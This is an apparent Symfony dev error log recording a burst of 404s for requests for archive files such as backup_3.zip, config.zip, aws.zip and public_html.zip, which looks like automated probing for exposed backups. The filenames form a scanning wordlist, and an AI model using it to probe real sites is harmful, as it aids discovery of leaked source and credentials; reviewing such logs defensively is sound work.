  8353. [2025-12-20 21:33:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dev.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dev.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8354. [2025-12-20 21:33:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /bak.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /bak.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8355. [2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /panel.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /panel.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8356. [2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /admin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /admin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8357. [2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /base.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /base.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8358. [2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_3.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_3.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8359. [2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /documents.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /documents.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8360. [2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8361. [2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /photos.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /photos.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8362. [2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public_html.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public_html.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8363. [2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8364. [2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /site.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /site.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8365. [2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /gallery.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /gallery.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8366. [2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /experimental.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /experimental.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8367. [2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webapps.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webapps.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8368. [2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /subdomain.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /subdomain.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8369. [2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /clone.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /clone.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8370. [2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8371. [2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /package-lock.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /package-lock.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8372. [2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /properties.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /properties.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8373. [2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /development.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /development.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8374. [2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webservices.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webservices.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8375. [2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /azure.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /azure.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8376. [2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /www.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /www.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8377. [2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /index.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /index.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8378. [2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /code.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /code.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8379. [2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /redis.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /redis.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8380. [2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cassandra.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cassandra.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8381. [2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sftp.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sftp.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8382. [2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /libraries.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /libraries.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8383. [2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8384. [2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /postgresql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /postgresql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8385. [2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-2024.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-2024.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8386. [2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /copy.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /copy.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8387. [2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /vps.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /vps.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8388. [2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mirror.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mirror.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8389. [2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-full.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-full.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8390. [2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /alpha.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /alpha.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8391. [2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /resources.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /resources.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8392. [2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /content.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /content.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8393. [2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /repository.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /repository.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8394. [2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /scripts.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /scripts.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8395. [2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /html.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /html.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
